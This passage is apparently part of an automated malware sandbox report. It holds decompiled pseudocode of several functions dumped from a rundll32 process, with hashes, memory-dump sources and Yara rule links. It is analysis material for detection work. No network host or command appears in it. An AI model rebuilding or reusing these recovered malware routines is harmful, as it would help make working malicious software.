                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29f4324973c04f7b4ea9946a473dd46e0f3f11af76a1ed9e8870845793a7c6d1
                                                  • Instruction ID: 13b092ec71b9763902923fb91aebd6c13ea1a705ff6197c1594565c1f28607f7
                                                  • Opcode Fuzzy Hash: 29f4324973c04f7b4ea9946a473dd46e0f3f11af76a1ed9e8870845793a7c6d1
                                                  • Instruction Fuzzy Hash: A5513E71801229ABDF10DFD4DC44DEEBFB8EF49324F10411AF990A6290E775AA84CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B9152, Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E046B9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E046B3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x46bd27c; // 0x96a5a8
						_t20 = _t68 + 0x46be1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E046B7C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6; // 0x7504d5b0
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                  0x046b9158
                                                  0x046b915b
                                                  0x046b916b
                                                  0x046b9174
                                                  0x046b9178
                                                  0x046b9246
                                                  0x046b924c
                                                  0x046b924c
                                                  0x046b9192
                                                  0x046b9197
                                                  0x046b919b
                                                  0x046b91a1
                                                  0x046b91a6
                                                  0x046b91ad
                                                  0x046b91bc
                                                  0x046b91bc
                                                  0x046b91c0
                                                  0x046b91c2
                                                  0x046b91ce
                                                  0x046b91d9
                                                  0x046b91e4
                                                  0x046b91e8
                                                  0x046b91f2
                                                  0x046b91f6
                                                  0x046b91f8
                                                  0x046b91fd
                                                  0x046b9204
                                                  0x046b9214
                                                  0x046b9214
                                                  0x046b91fd
                                                  0x046b91f6
                                                  0x046b9216
                                                  0x046b921b
                                                  0x046b9220
                                                  0x046b9220
                                                  0x046b9226
                                                  0x046b922c
                                                  0x046b9231
                                                  0x046b9231
                                                  0x046b9236
                                                  0x046b923b
                                                  0x046b923b
                                                  0x046b9236
                                                  0x046b91c0
                                                  0x046b923d
                                                  0x046b9243
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525f0df1c76ad394142b653e81303e0a5843d8a69b6c4eea07958f6a164e71ff
                                                  • Instruction ID: 656ead118c81b683a88a04eadadb487b78c7c26fb7965be78d0062f7854d6d6c
                                                  • Opcode Fuzzy Hash: 525f0df1c76ad394142b653e81303e0a5843d8a69b6c4eea07958f6a164e71ff
                                                  • Instruction Fuzzy Hash: 98312AB2900119AFCB21DFA5C888CDBBB7AFFC97407154658F9559B210E232ED91CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B269C, Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f368187c814687b12e269be5046e12e2a48495bc28e53bcf70605adc70745d28
                                                  • Instruction ID: 5fd74d56164a6c0d5ab31076f9ad3735f7eec535e671e57ba02fd48fbef279fc
                                                  • Opcode Fuzzy Hash: f368187c814687b12e269be5046e12e2a48495bc28e53bcf70605adc70745d28
                                                  • Instruction Fuzzy Hash: AB310AB1A00209EFEB15DF69D894AAEB7F9EF58310B204069E945D7210F734EE819B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B3AEF, Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af0fd6fa802b84e5214a088408984adb1bc22f89e794da2d8089d8434daf3c10
                                                  • Instruction ID: 0a3b8a33bbc3c0e3d7bb410f67ad9fbfa232b1ab5e421aa4ebfc972d08e73ddf
                                                  • Opcode Fuzzy Hash: af0fd6fa802b84e5214a088408984adb1bc22f89e794da2d8089d8434daf3c10
                                                  • Instruction Fuzzy Hash: CD31E776A00109EFCB05CF98D4C48EE7BB5FF58340B10842EE94AA7310E775AAC5CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B73FD, Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 62%
                                                  			E046B73FD(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E046BA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x46bd27c; // 0x96a5a8
				_t4 = _t24 + 0x46bede0; // 0x5029388
				_t5 = _t24 + 0x46bed88; // 0x4f0053
				_t26 = E046B1262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					 *0x46bd0f4(_v16, 0,  &_v12);
					_t52 = __imp__; // 0x75145520
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x46bd27c; // 0x96a5a8
						_t11 = _t32 + 0x46bedd4; // 0x502937c
						_t48 = _t11;
						_t12 = _t32 + 0x46bed88; // 0x4f0053
						_t55 = E046B7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x46bd27c; // 0x96a5a8
							_t13 = _t35 + 0x46bee1e; // 0x30314549
							_t37 = E046B89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x46bd25c - 6;
								if( *0x46bd25c <= 6) {
									_t42 =  *0x46bd27c; // 0x96a5a8
									_t15 = _t42 + 0x46bec2a; // 0x52384549
									E046B89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x46bd27c; // 0x96a5a8
							_t17 = _t38 + 0x46bee18; // 0x50293c0
							_t18 = _t38 + 0x46bedf0; // 0x680043
							_t40 = E046B2659(_v8, 0x80000001, _t55, _t18, _t17);
							_t45 = _t40;
							 *_t52( *0x46bd238, 0, _t55);
						}
					}
					 *_t52( *0x46bd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E046B1F99(_t54);
				}
				return _t45;
			}




















                                                  0x046b73fd
                                                  0x046b740d
                                                  0x046b7410
                                                  0x046b7417
                                                  0x046b7419
                                                  0x046b7419
                                                  0x046b741c
                                                  0x046b7421
                                                  0x046b7428
                                                  0x046b7435
                                                  0x046b743a
                                                  0x046b743e
                                                  0x046b744c
                                                  0x046b7452
                                                  0x046b745a
                                                  0x046b745e
                                                  0x046b74ef
                                                  0x046b74ef
                                                  0x046b7464
                                                  0x046b7464
                                                  0x046b7469
                                                  0x046b7469
                                                  0x046b7470
                                                  0x046b747c
                                                  0x046b747e
                                                  0x046b7480
                                                  0x046b7482
                                                  0x046b7489
                                                  0x046b7494
                                                  0x046b749b
                                                  0x046b749d
                                                  0x046b74a4
                                                  0x046b74a6
                                                  0x046b74ad
                                                  0x046b74b8
                                                  0x046b74b8
                                                  0x046b74a4
                                                  0x046b74bd
                                                  0x046b74c2
                                                  0x046b74c9
                                                  0x046b74d9
                                                  0x046b74e7
                                                  0x046b74e9
                                                  0x046b74e9
                                                  0x046b7480
                                                  0x046b74fb
                                                  0x046b74fb
                                                  0x046b74fd
                                                  0x046b7502
                                                  0x046b7504
                                                  0x046b7504
                                                  0x046b750f

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13473747d2a5f3c3736c04aca7062299887c47d85f7dc9eeb749cd2aee10b481
                                                  • Instruction ID: 2834c738d6fdbc9bf7e106a74963679a5957ec3f88143d3a242f8afe532d824f
                                                  • Opcode Fuzzy Hash: 13473747d2a5f3c3736c04aca7062299887c47d85f7dc9eeb749cd2aee10b481
                                                  • Instruction Fuzzy Hash: 6B319075910208BFEB21DBE4DC84DDA7BACEB44305F144066A644AB260F3B1EEC4DBD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B7B5D, Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E046B7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x46bd27c; // 0x96a5a8
				_t2 = _t22 + 0x46be0dc; // 0x5028684
				_t3 = _t22 + 0x46be0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x46bd15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x46bd27c; // 0x96a5a8
						_t8 = _t36 + 0x46be3b8; // 0x5f005f
						E046B908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x46bd158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}















                                                  0x046b7b6a
                                                  0x046b7b6f
                                                  0x046b7b7b
                                                  0x046b7b81
                                                  0x046b7b84
                                                  0x046b7b87
                                                  0x046b7b8d
                                                  0x046b7b91
                                                  0x046b7b96
                                                  0x046b7b9c
                                                  0x046b7ba4
                                                  0x046b7bab
                                                  0x046b7bb0
                                                  0x046b7bb0
                                                  0x046b7bb3
                                                  0x046b7bc9
                                                  0x046b7bcd
                                                  0x046b7bdc
                                                  0x046b7be2
                                                  0x046b7be6
                                                  0x046b7be9
                                                  0x046b7bf5
                                                  0x046b7beb
                                                  0x046b7bee
                                                  0x046b7bee
                                                  0x046b7be9
                                                  0x046b7bfa
                                                  0x046b7bff
                                                  0x046b7bff
                                                  0x046b7c02
                                                  0x046b7c08
                                                  0x046b7c08
                                                  0x046b7c11

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4199f91ee2139fd74a43aa1a4ac64e447a2e93398019b7c07b86c64f2557c1d3
                                                  • Instruction ID: a2183a3340d77254780a8ba35bd06b46935ab63c1f28d7073d2c0eef0fcab974
                                                  • Opcode Fuzzy Hash: 4199f91ee2139fd74a43aa1a4ac64e447a2e93398019b7c07b86c64f2557c1d3
                                                  • Instruction Fuzzy Hash: 51213075600218BFCB11DFA4C888DCEBBBDEF89755B008455F506DB340E675AE85CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B83B7, Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bae1a4206a937faab4ab5dff816f0e344a9c5ed8b99106d3b36cc86c93809f04
                                                  • Instruction ID: 4c2d365e9c2de9e24e8dd572347817f793abc607c84aa3a0507b148cfc3502ca
                                                  • Opcode Fuzzy Hash: bae1a4206a937faab4ab5dff816f0e344a9c5ed8b99106d3b36cc86c93809f04
                                                  • Instruction Fuzzy Hash: 7C2119B2900218BFDB11AF95CC45ADEBFBDEF08740F10406AF640B6210E7759B949BE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B43DF, Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E046B43DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				void* _t19;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t51 = E046B2049(_t19, 0xc);
				if(_t51 == 0) {
					_t21 = 8;
				} else {
					_t22 =  *0x46bd27c; // 0x96a5a8
					_t1 = _t22 + 0x46be058; // 0x5028600
					_t2 = _t22 + 0x46be028; // 0x2df01
					_t24 =  *0x46bd15c(_t2, 0, 4, _t1, _t51); // executed
					_v8 = _t24;
					if(_t24 < 0) {
						L8:
						E046B9039(_t24, _t51);
						_t21 = _v8;
					} else {
						_t43 =  *0x46bd27c; // 0x96a5a8
						_t26 =  *_t51;
						_t4 = _t51 + 4; // 0x4
						_t35 = _t4;
						_t5 = _t43 + 0x46be048; // 0xd30c1661
						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
						_v8 = _t27;
						_t28 =  *_t51;
						_t40 =  *_t28;
						if(_t27 < 0) {
							L6:
							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
						} else {
							_t45 =  *0x46bd27c; // 0x96a5a8
							_t7 = _t51 + 8; // 0x8
							_t49 = _t7;
							_t8 = _t45 + 0x46be068; // 0x2df05
							_t29 =  *_t40(_t28, _t8, _t49);
							_v8 = _t29;
							if(_t29 < 0) {
								_t30 =  *_t35;
								 *((intOrPtr*)( *_t30 + 8))(_t30);
								_t28 =  *_t51;
								_t40 =  *_t28;
								goto L6;
							} else {
								_t32 =  *_t49;
								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
								_t24 = _a4;
								_a4 = _a4 & 0x00000000;
								 *_a4 = _t51;
							}
						}
						if(_v8 >= 0) {
							_t21 = _a4;
						} else {
							goto L8;
						}
					}
				}
				return _t21;
			}



















                                                  0x046b43eb
                                                  0x046b43ef
                                                  0x046b4497
                                                  0x046b43f5
                                                  0x046b43f5
                                                  0x046b43fb
                                                  0x046b4406
                                                  0x046b440d
                                                  0x046b4415
                                                  0x046b4418
                                                  0x046b448a
                                                  0x046b448b
                                                  0x046b4490
                                                  0x046b441a
                                                  0x046b441a
                                                  0x046b4420
                                                  0x046b4426
                                                  0x046b4426
                                                  0x046b442a
                                                  0x046b4432
                                                  0x046b4434
                                                  0x046b4439
                                                  0x046b443b
                                                  0x046b443d
                                                  0x046b447e
                                                  0x046b447f
                                                  0x046b443f
                                                  0x046b443f
                                                  0x046b4445
                                                  0x046b4445
                                                  0x046b4449
                                                  0x046b4451
                                                  0x046b4455
                                                  0x046b4458
                                                  0x046b4472
                                                  0x046b4477
                                                  0x046b447a
                                                  0x046b447c
                                                  0x00000000
                                                  0x046b445a
                                                  0x046b445a
                                                  0x046b4461
                                                  0x046b4467
                                                  0x046b446a
                                                  0x046b446e
                                                  0x046b446e
                                                  0x046b4458
                                                  0x046b4488
                                                  0x046b449a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b4488
                                                  0x046b4418
                                                  0x046b449f

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7af369b383d514ffdb0183693e503474be33de82155dd4e4d1258d81f7daf077
                                                  • Instruction ID: 9821f6a98381219eb9da5f9f6c4b628bfd392f45efdef33f852b8c0fa9f1160c
                                                  • Opcode Fuzzy Hash: 7af369b383d514ffdb0183693e503474be33de82155dd4e4d1258d81f7daf077
                                                  • Instruction Fuzzy Hash: AF2126B5600604EFE710CFA4C888F9A73B8EF89708F108558E645CF251EB75EA85CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B1A70, Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 35%
                                                  			E046B1A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t46;

				_push( &_v12);
				_push(__eax);
				_t37 = 0;
				_t44 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					__imp__(0xc8);
					_push( &_v12);
					_push(__eax);
					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
				}
				if(_v8 >= _t37) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							__imp__(_v16);
							_t44 = _t31;
							if(_t44 != 0) {
								_t44 = _t44 + 1;
								_t46 = _t44 + _t44;
								_t37 = E046B2049(_t31, _t46);
								if(_t37 == 0) {
									_v8 = 0x8007000e;
								} else {
									_push(_t46);
									_push(_v16);
									_push(_t37);
									L046B5544();
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t37;
					 *_a8 = _t44 + _t44;
				}
				goto L13;
			}













                                                  0x046b1a80
                                                  0x046b1a81
                                                  0x046b1a82
                                                  0x046b1a84
                                                  0x046b1a86
                                                  0x046b1a8b
                                                  0x046b1a8e
                                                  0x046b1b25
                                                  0x046b1b2c
                                                  0x046b1b2c
                                                  0x046b1a97
                                                  0x046b1a9e
                                                  0x046b1aa9
                                                  0x046b1aaa
                                                  0x046b1aae
                                                  0x046b1aae
                                                  0x046b1ab4
                                                  0x046b1ab6
                                                  0x046b1abb
                                                  0x046b1ac4
                                                  0x046b1acc
                                                  0x046b1acf
                                                  0x046b1ad4
                                                  0x046b1ada
                                                  0x046b1ade
                                                  0x046b1ae0
                                                  0x046b1ae1
                                                  0x046b1aea
                                                  0x046b1aee
                                                  0x046b1aff
                                                  0x046b1af0
                                                  0x046b1af0
                                                  0x046b1af1
                                                  0x046b1af4
                                                  0x046b1af5
                                                  0x046b1afa
                                                  0x046b1b09
                                                  0x046b1b09
                                                  0x046b1ade
                                                  0x046b1b0f
                                                  0x046b1b15
                                                  0x046b1b15
                                                  0x046b1b1e
                                                  0x046b1b23
                                                  0x046b1b23
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f22f302503a1b32098996ff14dc56fd516dc1eb5df228daa037893221ec9ac3
                                                  • Instruction ID: 552f0b49f7f8c70831197371e5cf427fe7f0de424a83f0dfa50ddde461c3bd5a
                                                  • Opcode Fuzzy Hash: 0f22f302503a1b32098996ff14dc56fd516dc1eb5df228daa037893221ec9ac3
                                                  • Instruction Fuzzy Hash: 4D214F75A00209FFCB10DFA4D998DDEBBB5EF49345B14416DE845D7210F731AA85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B8504, Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E046B8504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t23;
				void* _t28;
				void* _t35;
				char _t38;
				intOrPtr _t40;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x46bd340; // 0x5028d39
				_push(0x800);
				_push(0);
				_push( *0x46bd238);
				if( *0x46bd24c >= 5) {
					__imp__();
					if(__eax == 0) {
						L6:
						_t28 = 8;
						L7:
						if(_t28 != 0) {
							L10:
							 *0x46bd24c =  *0x46bd24c + 1;
							L11:
							return _t28;
						}
						_t42 = _a4;
						_t38 = _v8;
						 *_a16 = _a4;
						 *_a20 = E046B2496(_a4, _t38); // executed
						_t18 = E046BA66E(_t35, _t38, _t42); // executed
						if(_t18 != 0) {
							 *_a8 = _t38;
							 *_a12 = _t18;
							if( *0x46bd24c < 5) {
								 *0x46bd24c =  *0x46bd24c & 0x00000000;
							}
							goto L11;
						}
						_t28 = 0xbf;
						E046BA1B0();
						__imp__( *0x46bd238, 0, _t38); // executed
						goto L10;
					}
					_t23 = E046BA279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
					L5:
					_t28 = _t23;
					goto L7;
				}
				__imp__(); // executed
				if(__eax == 0) {
					goto L6;
				}
				_t23 = E046B8B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
				goto L5;
			}











                                                  0x046b8507
                                                  0x046b8508
                                                  0x046b8512
                                                  0x046b8519
                                                  0x046b851e
                                                  0x046b8520
                                                  0x046b8526
                                                  0x046b8546
                                                  0x046b854e
                                                  0x046b8566
                                                  0x046b8568
                                                  0x046b8569
                                                  0x046b856b
                                                  0x046b85a9
                                                  0x046b85a9
                                                  0x046b85af
                                                  0x046b85b5
                                                  0x046b85b5
                                                  0x046b856d
                                                  0x046b8573
                                                  0x046b8576
                                                  0x046b8585
                                                  0x046b8587
                                                  0x046b858e
                                                  0x046b85c2
                                                  0x046b85c7
                                                  0x046b85c9
                                                  0x046b85cb
                                                  0x046b85cb
                                                  0x00000000
                                                  0x046b85c9
                                                  0x046b8590
                                                  0x046b8595
                                                  0x046b85a3
                                                  0x00000000
                                                  0x046b85a3
                                                  0x046b855d
                                                  0x046b8562
                                                  0x046b8562
                                                  0x00000000
                                                  0x046b8562
                                                  0x046b8528
                                                  0x046b8530
                                                  0x00000000
                                                  0x00000000
                                                  0x046b853f
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
